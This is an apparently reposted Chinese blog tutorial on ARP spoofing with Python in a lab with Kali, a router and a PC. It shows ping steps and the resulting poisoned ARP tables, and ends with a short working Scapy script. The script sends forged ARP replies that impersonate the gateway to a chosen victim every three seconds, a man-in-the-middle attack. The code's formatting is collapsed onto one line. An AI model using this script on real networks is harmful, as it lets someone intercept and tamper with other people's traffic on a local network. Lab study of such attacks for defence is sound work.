使用python实现arp欺骗
生活随笔
收集整理的這篇文章主要介紹了
使用python实现arp欺骗
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
實驗拓撲:
1.首先進行ping測試網關和kali,來獲取mac地址
ping 192.168.72.131
ping 192.168.72.20
MAC地址對應結果如下:
2.進行使用腳本中間人欺騙,腳本放在最后
3.查看欺騙后的arp表,R1和PC1都認為對方的mac地址是7B-26,也就是kali的mac
?python腳本:
import sys import time from scapy.all import sendp, ARP, Etherif len(sys.argv) != 3:print(sys.argv[0] + ":<target_IP> <spoof_ip>")sys.exit()victimIP = sys.argv[1] # 接收第二個參數:target_IP gatewayIP = sys.argv[2] packet = Ether() / ARP(psrc=gatewayIP, pdst=victimIP) # 封裝一個二層的ARP包,進行欺騙while True:sendp(packet) # 發送包time.sleep(3)print(packet.show())總結
以上是生活随笔為你收集整理的使用python实现arp欺骗的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 数据库课程设计基础需求
- 下一篇: 学习10:Python重要知识